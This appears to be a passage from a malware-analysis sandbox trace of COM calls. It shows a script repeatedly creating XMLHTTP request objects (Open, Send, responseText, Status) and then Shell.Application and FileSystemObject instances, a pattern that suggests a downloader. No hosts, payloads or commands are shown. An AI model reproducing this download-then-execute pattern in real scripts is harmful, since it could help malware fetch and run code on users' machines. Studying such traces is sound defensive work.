	[0783.325] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0783.325] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0783.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0783.325] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0783.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.325] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0783.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0783.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.325] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0783.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0784.607] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0784.607] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0784.607] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0784.608] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0784.608] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0784.608] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0784.608] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0784.608] SysStringLen (param_1=0x0) returned 0x0
	[0784.608] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0784.608] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0784.608] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0784.608] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0784.609] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0784.609] ??2@YAPEAX_K@Z () returned 0x62f350
	[0784.609] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0784.609] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0784.609] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0784.609] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0784.609] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0784.609] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0784.609] SysStringLen (param_1=0x0) returned 0x0
	[0784.609] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0784.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0784.613] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0784.613] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0784.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0784.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0784.613] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0786.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0786.026] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0786.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0786.028] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0786.028] SysStringLen (param_1=0x0) returned 0x0
	[0786.028] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0786.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0786.028] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0786.028] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0786.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0786.028] ??2@YAPEAX_K@Z () returned 0x62f330
	[0786.028] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0786.028] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0786.029] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0786.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0786.029] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0786.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.029] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0786.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0786.032] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0786.032] SysStringLen (param_1=0x0) returned 0x0
	[0786.032] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0786.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0786.033] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0786.033] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0786.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0786.033] ??2@YAPEAX_K@Z () returned 0x62f310
	[0786.033] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0786.034] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0786.034] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0786.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0786.034] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0786.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.034] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0786.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0786.034] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0786.034] SysStringLen (param_1=0x0) returned 0x0
	[0786.034] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0786.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0786.035] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0786.035] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0786.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0786.035] ??2@YAPEAX_K@Z () returned 0x62f330
	[0786.035] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0786.035] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0786.035] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0786.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0786.035] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0786.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.035] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0786.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0786.036] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0786.036] SysStringLen (param_1=0x0) returned 0x0
	[0786.036] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0786.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0786.036] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0786.036] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0786.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0786.036] ??2@YAPEAX_K@Z () returned 0x62f310
	[0786.036] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
